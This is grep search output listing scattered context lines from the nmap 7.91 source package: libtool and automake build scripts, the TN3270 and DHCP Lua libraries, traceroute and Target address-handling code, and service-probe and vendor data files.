nmap-7.91+dfsg1/ltmain.sh-7666-      fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-7693-	# Replace the output file specification.
nmap-7.91+dfsg1/ltmain.sh:7694:	compile_command=`$ECHO "X$compile_command" | $Xsed -e 's%@OUTPUT@%'"$output"'%g'`
nmap-7.91+dfsg1/ltmain.sh-7695-	link_command="$compile_command$compile_rpath"
##############################################
nmap-7.91+dfsg1/ltmain.sh-7740-	# Replace the output file specification.
nmap-7.91+dfsg1/ltmain.sh:7741:	link_command=`$ECHO "X$link_command" | $Xsed -e 's%@OUTPUT@%'"$output"'%g'`
nmap-7.91+dfsg1/ltmain.sh-7742-	# Delete the old output file.
##############################################
nmap-7.91+dfsg1/ltmain.sh-7759-	  if test "$fast_install" = yes; then
nmap-7.91+dfsg1/ltmain.sh:7760:	    relink_command=`$ECHO "X$compile_var$compile_command$compile_rpath" | $Xsed -e 's%@OUTPUT@%\$progdir/\$file%g'`
nmap-7.91+dfsg1/ltmain.sh-7761-	  else
##############################################
nmap-7.91+dfsg1/ltmain.sh-7771-      # Replace the output file specification.
nmap-7.91+dfsg1/ltmain.sh:7772:      link_command=`$ECHO "X$link_command" | $Xsed -e 's%@OUTPUT@%'"$output_objdir/$outputname"'%g'`
nmap-7.91+dfsg1/ltmain.sh-7773-
##############################################
nmap-7.91+dfsg1/ltmain.sh-7795-	relink_command="(cd `pwd`; $relink_command)"
nmap-7.91+dfsg1/ltmain.sh:7796:	relink_command=`$ECHO "X$relink_command" | $Xsed -e "$sed_quote_subst"`
nmap-7.91+dfsg1/ltmain.sh-7797-      fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-7804-	esac
nmap-7.91+dfsg1/ltmain.sh:7805:	qecho=`$ECHO "X$qecho" | $Xsed -e "$sed_quote_subst"`
nmap-7.91+dfsg1/ltmain.sh-7806-      else
nmap-7.91+dfsg1/ltmain.sh:7807:	qecho=`$ECHO "X$ECHO" | $Xsed -e "$sed_quote_subst"`
nmap-7.91+dfsg1/ltmain.sh-7808-      fi
##############################################
nmap-7.91+dfsg1/ltmain.sh-8038-      relink_command="(cd `pwd`; $SHELL $progpath $preserve_args --mode=relink $libtool_args @inst_prefix_dir@)"
nmap-7.91+dfsg1/ltmain.sh:8039:      relink_command=`$ECHO "X$relink_command" | $Xsed -e "$sed_quote_subst"`
nmap-7.91+dfsg1/ltmain.sh-8040-      if test "$hardcode_automatic" = yes ; then
##############################################
nmap-7.91+dfsg1/ltmain.sh-8058-		name="$func_basename_result"
nmap-7.91+dfsg1/ltmain.sh:8059:		eval libdir=`${SED} -n -e 's/^libdir=\(.*\)$/\1/p' $deplib`
nmap-7.91+dfsg1/ltmain.sh-8060-		test -z "$libdir" && \
##############################################
nmap-7.91+dfsg1/ltmain.sh-8074-		name="$func_basename_result"
nmap-7.91+dfsg1/ltmain.sh:8075:		eval libdir=`${SED} -n -e 's/^libdir=\(.*\)$/\1/p' $lib`
nmap-7.91+dfsg1/ltmain.sh-8076-		test -z "$libdir" && \
##############################################
nmap-7.91+dfsg1/ltmain.sh-8093-		name="$func_basename_result"
nmap-7.91+dfsg1/ltmain.sh:8094:		eval libdir=`${SED} -n -e 's/^libdir=\(.*\)$/\1/p' $lib`
nmap-7.91+dfsg1/ltmain.sh-8095-		test -z "$libdir" && \
##############################################
nmap-7.91+dfsg1/ltmain.sh-8397-# ### BEGIN LIBTOOL TAG CONFIG: disable-static
nmap-7.91+dfsg1/ltmain.sh:8398:build_old_libs=`case $build_libtool_libs in yes) echo no;; *) echo yes;; esac`
nmap-7.91+dfsg1/ltmain.sh-8399-# ### END LIBTOOL TAG CONFIG: disable-static
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-879-        self:write_char("\00")
nmap-7.91+dfsg1/nselib/tn3270.lua:880:        self.buffer_address = self:INC_BUF_ADDR(self.buffer_address)
nmap-7.91+dfsg1/nselib/tn3270.lua-881-        -- set the current position one ahead (after SF)
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-900-        i = i + 1
nmap-7.91+dfsg1/nselib/tn3270.lua:901:        self.buffer_address = self:INC_BUF_ADDR(self.buffer_address)
nmap-7.91+dfsg1/nselib/tn3270.lua-902-      elseif cp == self.orders.SBA then
nmap-7.91+dfsg1/nselib/tn3270.lua-903-        stdnse.debug(4,"Set Buffer Address (SBA) 0x11")
nmap-7.91+dfsg1/nselib/tn3270.lua:904:        self.buffer_address = self.DECODE_BADDR(data:byte(i+1), data:byte(i+2))
nmap-7.91+dfsg1/nselib/tn3270.lua-905-        stdnse.debug(4,"Buffer Address: " .. self.buffer_address)
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-926-        stdnse.debug(4,"Repeat to Address (RA) 0x3C")
nmap-7.91+dfsg1/nselib/tn3270.lua:927:        local ra_baddr = self.DECODE_BADDR(data:byte(i+1), data:byte(i+2))
nmap-7.91+dfsg1/nselib/tn3270.lua-928-        stdnse.debug(4,"Repeat Character: " .. stdnse.tohex(data:sub(i+1,i+2)))
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-938-          self:write_char(char_to_repeat)
nmap-7.91+dfsg1/nselib/tn3270.lua:939:          self.buffer_address = self:INC_BUF_ADDR(self.buffer_address)
nmap-7.91+dfsg1/nselib/tn3270.lua-940-        end
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-942-        stdnse.debug(4,"Erase Unprotected All (EAU) 0x12")
nmap-7.91+dfsg1/nselib/tn3270.lua:943:        local eua_baddr = self.DECODE_BADDR(data:byte(i+1), data:byte(i+2))
nmap-7.91+dfsg1/nselib/tn3270.lua-944-        i = i + 3
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-948-          -- do nothing for now. this feature isn't supported/required at the moment
nmap-7.91+dfsg1/nselib/tn3270.lua:949:          self.buffer_address = self:INC_BUF_ADDR(self.buffer_address)
nmap-7.91+dfsg1/nselib/tn3270.lua-950-          --stdnse.debug(3,"Currrent Address: " .. self.buffer_address)
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-958-        self:write_char(self, ge_char)
nmap-7.91+dfsg1/nselib/tn3270.lua:959:        self.buffer_address = self:INC_BUF_ADDR(self.buffer_address)
nmap-7.91+dfsg1/nselib/tn3270.lua-960-      elseif cp == self.orders.MF then
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-973-        end
nmap-7.91+dfsg1/nselib/tn3270.lua:974:        self.buffer_address = self:INC_BUF_ADDR(self.buffer_address)
nmap-7.91+dfsg1/nselib/tn3270.lua-975-      elseif cp == self.orders.SA then
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-991-        self:write_char("\064")
nmap-7.91+dfsg1/nselib/tn3270.lua:992:        self.buffer_address = self:INC_BUF_ADDR(self.buffer_address)
nmap-7.91+dfsg1/nselib/tn3270.lua-993-        i = i + 1
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1000-        self:write_char(data:sub(i,i))
nmap-7.91+dfsg1/nselib/tn3270.lua:1001:        self.buffer_address = self:INC_BUF_ADDR(self.buffer_address)
nmap-7.91+dfsg1/nselib/tn3270.lua-1002-        self.first_screen = true
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1028-    stdnse.debug(3,"Output Address: ".. output_addr)
nmap-7.91+dfsg1/nselib/tn3270.lua:1029:    self.output_buffer[output_addr] = self:ENCODE_BADDR(self.cursor_addr)
nmap-7.91+dfsg1/nselib/tn3270.lua-1030-    return self:send_tn3270(self.output_buffer)
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1152-      self:BA_TO_COL(self.cursor_addr) )
nmap-7.91+dfsg1/nselib/tn3270.lua:1153:    table.insert(self.output_buffer, self:ENCODE_BADDR(self.cursor_addr + #data)) -- location of cursor
nmap-7.91+dfsg1/nselib/tn3270.lua-1154-    table.insert(self.output_buffer, self.orders.SBA) -- set the buffer address to the following location
nmap-7.91+dfsg1/nselib/tn3270.lua:1155:    table.insert(self.output_buffer, self:ENCODE_BADDR(self.cursor_addr)) -- location of buffer address
nmap-7.91+dfsg1/nselib/tn3270.lua-1156-    for i = 1, #data do
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1173-    self.output_buffer[0] = string.pack("B",self.aids.ENTER)
nmap-7.91+dfsg1/nselib/tn3270.lua:1174:    table.insert(self.output_buffer, self:ENCODE_BADDR(cursor_location))
nmap-7.91+dfsg1/nselib/tn3270.lua-1175-    stdnse.debug(3,"Cursor Location ("..cursor_location.."): Row: %s, Column: %s ",
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1180-    cursor_location = location
nmap-7.91+dfsg1/nselib/tn3270.lua:1181:    table.insert(self.output_buffer, self:ENCODE_BADDR(cursor_location))
nmap-7.91+dfsg1/nselib/tn3270.lua-1182-    for j = 1, #data do
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1200-    self.output_buffer[0] = string.pack("B",self.aids.ENTER)
nmap-7.91+dfsg1/nselib/tn3270.lua:1201:    table.insert(self.output_buffer, self:ENCODE_BADDR(cursor_location))
nmap-7.91+dfsg1/nselib/tn3270.lua-1202-    stdnse.debug(3,"Cursor Location ("..cursor_location.."): Row: %s, Column: %s ",
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1208-      cursor_location = location_tuple[i][1]
nmap-7.91+dfsg1/nselib/tn3270.lua:1209:      table.insert(self.output_buffer, self:ENCODE_BADDR(cursor_location))
nmap-7.91+dfsg1/nselib/tn3270.lua-1210-      for j = 1, #location_tuple[i][2] do
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1221-    self.output_buffer[0] = string.pack("B",self.aids.ENTER)
nmap-7.91+dfsg1/nselib/tn3270.lua:1222:    table.insert(self.output_buffer, self:ENCODE_BADDR(self.cursor_addr))
nmap-7.91+dfsg1/nselib/tn3270.lua-1223-    table.insert(self.output_buffer, self.orders.SBA)
nmap-7.91+dfsg1/nselib/tn3270.lua:1224:    table.insert(self.output_buffer, self:ENCODE_BADDR(self.cursor_addr))
nmap-7.91+dfsg1/nselib/tn3270.lua-1225-    return self:send_tn3270(self.output_buffer)
##############################################
nmap-7.91+dfsg1/nselib/tn3270.lua-1240-      self:BA_TO_COL(self.cursor_addr) )
nmap-7.91+dfsg1/nselib/tn3270.lua:1241:    self.output_buffer[1] = self:ENCODE_BADDR(self.cursor_addr)
nmap-7.91+dfsg1/nselib/tn3270.lua-1242-    return self:send_tn3270(self.output_buffer)
##############################################
nmap-7.91+dfsg1/nselib/packet.lua-496--- @return Link-local IPv6 address string.
nmap-7.91+dfsg1/nselib/packet.lua:497:function mac_to_lladdr(mac)
nmap-7.91+dfsg1/nselib/packet.lua-498-  if not mac then
##############################################
nmap-7.91+dfsg1/nselib/data/enterprise_numbers.txt-17589-17713	Cambium Networks Limited (formerly 'PipingHot Networks Limited')
nmap-7.91+dfsg1/nselib/data/enterprise_numbers.txt:17590:17714	ASM Enterprises
nmap-7.91+dfsg1/nselib/data/enterprise_numbers.txt-17591-17715	Mitsukoshi Infomation Service Co.,Ltd.
##############################################
nmap-7.91+dfsg1/nselib/data/mgroupnames.db-37-224.0.0.36	224.0.0.36	DTCP Announcement
nmap-7.91+dfsg1/nselib/data/mgroupnames.db:38:224.0.0.37	224.0.0.68	zeroconfaddr   (renew 12/02)
nmap-7.91+dfsg1/nselib/data/mgroupnames.db-39-224.0.0.69	224.0.0.100	Reserved
##############################################
nmap-7.91+dfsg1/nselib/dhcp.lua-430-    overrides['giaddr'] or 0)
nmap-7.91+dfsg1/nselib/dhcp.lua:431:  packet = packet .. mac_address .. string.rep('\0', 16 - #mac_address)                        -- chaddr (MAC address)
nmap-7.91+dfsg1/nselib/dhcp.lua-432-  packet = packet .. (overrides['sname'] or string.rep('\0', 64))                              -- sname
##############################################
nmap-7.91+dfsg1/nmap-mac-prefixes-21656-00033D Ilshin Lab
nmap-7.91+dfsg1/nmap-mac-prefixes:21657:000366 ASM Pacific Technology
nmap-7.91+dfsg1/nmap-mac-prefixes-21658-000362 Vodtel Communications
##############################################
nmap-7.91+dfsg1/CHANGELOG-9930-o Nsock now supports binding to a local address and setting IPv4
nmap-7.91+dfsg1/CHANGELOG:9931:  options with nsi_set_localaddr() and nsi_set_ipoptions(),
nmap-7.91+dfsg1/CHANGELOG-9932-  respectively. [Kris]
##############################################
nmap-7.91+dfsg1/traceroute.cc-461-      sslen = sizeof(hop->tag);
nmap-7.91+dfsg1/traceroute.cc:462:      target->TargetSockAddr(&hop->tag, &sslen);
nmap-7.91+dfsg1/traceroute.cc-463-    } else {
##############################################
nmap-7.91+dfsg1/traceroute.cc-616-      source_len = sizeof(source);
nmap-7.91+dfsg1/traceroute.cc:617:      host->target->SourceSockAddr(&source, &source_len);
nmap-7.91+dfsg1/traceroute.cc-618-      sent_time = get_now(now);
##############################################
nmap-7.91+dfsg1/traceroute.cc-623-    packet = this->build_packet(&source, &packetlen);
nmap-7.91+dfsg1/traceroute.cc:624:    send_ip_packet(rawsd, ethp, host->target->TargetSockAddr(), packet, packetlen);
nmap-7.91+dfsg1/traceroute.cc-625-    free(packet);
##############################################
nmap-7.91+dfsg1/traceroute.cc-863-  sslen = sizeof(srcaddr);
nmap-7.91+dfsg1/traceroute.cc:864:  targets[0]->SourceSockAddr(&srcaddr, &sslen);
nmap-7.91+dfsg1/traceroute.cc-865-  n = Snprintf(pcap_filter, sizeof(pcap_filter), "(ip or ip6) and dst host %s",
##############################################
nmap-7.91+dfsg1/traceroute.cc-1068-      sslen = sizeof(addr);
nmap-7.91+dfsg1/traceroute.cc:1069:      host->target->TargetSockAddr(&addr, &sslen);
nmap-7.91+dfsg1/traceroute.cc-1070-      if (sockaddr_storage_equal(&hop->tag, &addr)) {
##############################################
nmap-7.91+dfsg1/traceroute.cc-1276-    sslen = sizeof(ss);
nmap-7.91+dfsg1/traceroute.cc:1277:    host->target->TargetSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/traceroute.cc-1278-    if (sockaddr_storage_equal(&ss, &reply.from_addr)) {
##############################################
nmap-7.91+dfsg1/traceroute.cc-1372-    targets[i] = new Target();
nmap-7.91+dfsg1/traceroute.cc:1373:    targets[i]->setTargetSockAddr(&*addr_iter, sizeof(*addr_iter));
nmap-7.91+dfsg1/traceroute.cc-1374-    targets[i]->flags = HOST_UP;
##############################################
nmap-7.91+dfsg1/traceroute.cc-1386-    ss_len = sizeof(ss);
nmap-7.91+dfsg1/traceroute.cc:1387:    targets[i]->TargetSockAddr(&ss, &ss_len);
nmap-7.91+dfsg1/traceroute.cc-1388-    name_map[ss] = hostname;
##############################################
nmap-7.91+dfsg1/traceroute.cc-1449-    sslen = sizeof(ss);
nmap-7.91+dfsg1/traceroute.cc:1450:    (*host_iter)->target->TargetSockAddr(&ss, &sslen);
nmap-7.91+dfsg1/traceroute.cc-1451-    if (!sockaddr_storage_equal(&ss, target_addr))
##############################################
nmap-7.91+dfsg1/traceroute.cc-1485-    sslen = sizeof(hop.tag);
nmap-7.91+dfsg1/traceroute.cc:1486:    (*it)->TargetSockAddr(&hop.tag, &sslen);
nmap-7.91+dfsg1/traceroute.cc-1487-    hop.timedout = false;
##############################################
nmap-7.91+dfsg1/shtool-80-do
nmap-7.91+dfsg1/shtool:81:    if (set +x; test -z "`(eval $var=C; export $var) 2>&1`"); then
nmap-7.91+dfsg1/shtool-82-        eval $var=C; export $var
##############################################
nmap-7.91+dfsg1/shtool-174-fi
nmap-7.91+dfsg1/shtool:175:name=`echo "$0" | sed -e 's;.*/\([^/]*\)$;\1;' -e 's;-sh$;;' -e 's;\.sh$;;'`
nmap-7.91+dfsg1/shtool-176-case "$name" in
##############################################
nmap-7.91+dfsg1/shtool-294-                      sed -e 's/^x--\([a-zA-Z0-9-]*\)=\(.*\)$/opt_OPT="\1";opt_ARG="\2"/'`
nmap-7.91+dfsg1/shtool:295:                opt_STR=`echo $opt_OPT | sed -e 's/-/_/g'`
nmap-7.91+dfsg1/shtool-296-                eval "opt_OPT=\${opt_ALIAS_${opt_STR}-${opt_OPT}}"
##############################################
nmap-7.91+dfsg1/shtool-298-            --[a-zA-Z0-9]*)
nmap-7.91+dfsg1/shtool:299:                opt_OPT=`echo "x$1" | cut -c4-`
nmap-7.91+dfsg1/shtool:300:                opt_STR=`echo $opt_OPT | sed -e 's/-/_/g'`
nmap-7.91+dfsg1/shtool-301-                eval "opt_OPT=\${opt_ALIAS_${opt_STR}-${opt_OPT}}"
##############################################
nmap-7.91+dfsg1/shtool-309-            -[a-zA-Z0-9])
nmap-7.91+dfsg1/shtool:310:                opt_OPT=`echo "x$1" | cut -c3-`
nmap-7.91+dfsg1/shtool-311-                opt_ARG=''
##############################################
nmap-7.91+dfsg1/shtool-346-            echo "$msgprefix:Error: unknown option: \`$opt_OPT'" 1>&2
nmap-7.91+dfsg1/shtool:347:            echo "$msgprefix:Hint:  run \`$toolcmdhelp -h' or \`man shtool' for details" 1>&2
nmap-7.91+dfsg1/shtool-348-            exit 1
##############################################
nmap-7.91+dfsg1/shtool-353-    echo "$msgprefix:Error: missing argument to option \`$opt_PREV'" 1>&2
nmap-7.91+dfsg1/shtool:354:    echo "$msgprefix:Hint:  run \`$toolcmdhelp -h' or \`man shtool' for details" 1>&2
nmap-7.91+dfsg1/shtool-355-    exit 1
##############################################
nmap-7.91+dfsg1/shtool-368-            echo "$msgprefix:Error: invalid number of arguments (exactly $arg_NUMS expected)" 1>&2
nmap-7.91+dfsg1/shtool:369:            echo "$msgprefix:Hint:  run \`$toolcmd -h' or \`man shtool' for details" 1>&2
nmap-7.91+dfsg1/shtool-370-            exit 1
##############################################
nmap-7.91+dfsg1/shtool-375-            echo "$msgprefix:Error: invalid number of arguments (at least $arg_NUMS expected)" 1>&2
nmap-7.91+dfsg1/shtool:376:            echo "$msgprefix:Hint:  run \`$toolcmd -h' or \`man shtool' for details" 1>&2
nmap-7.91+dfsg1/shtool-377-            exit 1
##############################################
nmap-7.91+dfsg1/shtool-471-    if [ -d $dstpath ]; then
nmap-7.91+dfsg1/shtool:472:        dstpath=`echo "$dstpath" | sed -e 's:/$::'`
nmap-7.91+dfsg1/shtool-473-        dstisdir=1
##############################################
nmap-7.91+dfsg1/shtool-487-        if [ $dstisdir = 1 ]; then
nmap-7.91+dfsg1/shtool:488:            dstfile=`echo "$src" | sed -e 's;.*/\([^/]*\)$;\1;'`
nmap-7.91+dfsg1/shtool-489-            dst="$dst/$dstfile"
##############################################
nmap-7.91+dfsg1/nmap-service-probes-8016-match http m|^HTTP/1\.1 \d\d\d .*<title>Welcome to the Galty client depl</title>\r\n|s p/Galty Technologies GaltyExplorer httpd/ o/Windows/ cpe:/o:microsoft:windows/a
nmap-7.91+dfsg1/nmap-service-probes:8017:match http m|^HTTP/1\.1 \d\d\d .*\r\nServer: Adaptec ASM ([\d.]+)\r\n| p|Adaptec/IBM ServeRAID Management http config| v/$1/ d/storage-misc/
nmap-7.91+dfsg1/nmap-service-probes-8018-match http m|^HTTP/1\.1 \d\d\d .*\r\nDate: .*\r\nServer: darkstat/([\d.]+)\r\n| p/darkstat network analyzer httpd/ v/$1/ o/Unix/
##############################################
nmap-7.91+dfsg1/Target.h-132-     to the size of the sockaddr copied in. */
nmap-7.91+dfsg1/Target.h:133:  int TargetSockAddr(struct sockaddr_storage *ss, size_t *ss_len) const;
nmap-7.91+dfsg1/Target.h:134:  const struct sockaddr_storage *TargetSockAddr() const;
nmap-7.91+dfsg1/Target.h-135-  /* Note that it is OK to pass in a sockaddr_in or sockaddr_in6 casted
nmap-7.91+dfsg1/Target.h-136-     to sockaddr_storage */
nmap-7.91+dfsg1/Target.h:137:  void setTargetSockAddr(const struct sockaddr_storage *ss, size_t ss_len);
nmap-7.91+dfsg1/Target.h-138-  // Returns IPv4 target host address or {0} if unavailable.
##############################################
nmap-7.91+dfsg1/Target.h-142-  /* The source address used to reach the target */
nmap-7.91+dfsg1/Target.h:143:  int SourceSockAddr(struct sockaddr_storage *ss, size_t *ss_len) const;
nmap-7.91+dfsg1/Target.h:144:  const struct sockaddr_storage *SourceSockAddr() const;
nmap-7.91+dfsg1/Target.h-145-  /* Note that it is OK to pass in a sockaddr_in or sockaddr_in6 casted
nmap-7.91+dfsg1/Target.h-146-     to sockaddr_storage */
nmap-7.91+dfsg1/Target.h:147:  void setSourceSockAddr(const struct sockaddr_storage *ss, size_t ss_len);
nmap-7.91+dfsg1/Target.h-148-  struct sockaddr_storage source() const;
##############################################
nmap-7.91+dfsg1/Target.h-161-     just don't call this if it fails to resolve.  The hostname is blown
nmap-7.91+dfsg1/Target.h:162:     away when you setTargetSockAddr(), so make sure you do these in proper
nmap-7.91+dfsg1/Target.h-163-     order
##############################################
nmap-7.91+dfsg1/Target.h-179-  /* You can set to NULL to erase a name.  The targetname is blown
nmap-7.91+dfsg1/Target.h:180:     away when you setTargetSockAddr(), so make sure you do these in proper
nmap-7.91+dfsg1/Target.h-181-     order
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-49-DIST_SOURCES =
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in:50:am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`;
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-51-am__vpath_adj = case $$p in \
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in:52:    $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-53-    *) f=$$p;; \
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-54-  esac;
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in:55:am__strip_dir = `echo $$p | sed -e 's|^.*/||'`;
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-56-am__installdirs = "$(DESTDIR)$(dnetincludedir)"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-279-GTAGS:
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in:280:	here=`$(am__cd) $(top_builddir) && pwd` \
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-281-	  && cd $(top_srcdir) \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-287-distdir: $(DISTFILES)
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in:288:	@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in:289:	topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-290-	list='$(DISTFILES)'; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-301-	  if test -d $$d/$$file; then \
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in:302:	    dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
nmap-7.91+dfsg1/libdnet-stripped/include/dnet/Makefile.in-303-	    if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-57-	ps-recursive uninstall-recursive
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:58:am__vpath_adj_setup = srcdirstrip=`echo "$(srcdir)" | sed 's|.|.|g'`;
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-59-am__vpath_adj = case $$p in \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:60:    $(srcdir)/*) f=`echo "$$p" | sed "s|^$$srcdirstrip/||"`;; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-61-    *) f=$$p;; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-62-  esac;
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:63:am__strip_dir = `echo $$p | sed -e 's|^.*/||'`;
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-64-am__installdirs = "$(DESTDIR)$(includedir)"
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-282-	dot_seen=no; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:283:	target=`echo $@ | sed s/-recursive//`; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-284-	list='$(SUBDIRS)'; for subdir in $$list; do \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-317-	rev="$$rev ."; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:318:	target=`echo $@ | sed s/-recursive//`; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-319-	for subdir in $$rev; do \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-390-GTAGS:
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:391:	here=`$(am__cd) $(top_builddir) && pwd` \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-392-	  && cd $(top_srcdir) \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-398-distdir: $(DISTFILES)
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:399:	@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:400:	topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-401-	list='$(DISTFILES)'; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-412-	  if test -d $$d/$$file; then \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:413:	    dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-414-	    if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-428-	    || exit 1; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:429:	    distdir=`$(am__cd) $(distdir) && pwd`; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in:430:	    top_distdir=`$(am__cd) $(top_distdir) && pwd`; \
nmap-7.91+dfsg1/libdnet-stripped/include/Makefile.in-431-	    (cd $$subdir && \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-250-	  if test -f $$d$$p; then \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:251:	    f=`echo "$$p" | sed 's|^.*/||;$(transform)'`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-252-	    echo " $(binSCRIPT_INSTALL) '$$d$$p' '$(DESTDIR)$(bindir)/$$f'"; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-259-	@list='$(bin_SCRIPTS)'; for p in $$list; do \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:260:	  f=`echo "$$p" | sed 's|^.*/||;$(transform)'`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-261-	  echo " rm -f '$(DESTDIR)$(bindir)/$$f'"; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-288-	dot_seen=no; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:289:	target=`echo $@ | sed s/-recursive//`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-290-	list='$(SUBDIRS)'; for subdir in $$list; do \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-323-	rev="$$rev ."; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:324:	target=`echo $@ | sed s/-recursive//`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-325-	for subdir in $$rev; do \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-396-GTAGS:
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:397:	here=`$(am__cd) $(top_builddir) && pwd` \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-398-	  && cd $(top_srcdir) \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-406-	test -d $(distdir) || mkdir $(distdir)
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:407:	@srcdirstrip=`echo "$(srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:408:	topsrcdirstrip=`echo "$(top_srcdir)" | sed 's/[].[^$$\\*]/\\\\&/g'`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-409-	list='$(DISTFILES)'; \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-420-	  if test -d $$d/$$file; then \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:421:	    dir=`echo "/$$file" | sed -e 's,/[^/]*$$,,'`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-422-	    if test -d $(srcdir)/$$file && test $$d != $(srcdir); then \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-436-	    || exit 1; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:437:	    distdir=`$(am__cd) $(distdir) && pwd`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in:438:	    top_distdir=`$(am__cd) $(top_distdir) && pwd`; \
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-439-	    (cd $$subdir && \
##############################################
nmap-7.91+dfsg1/libdnet-stripped/Makefile.in-504-	chmod a-w $(distdir)
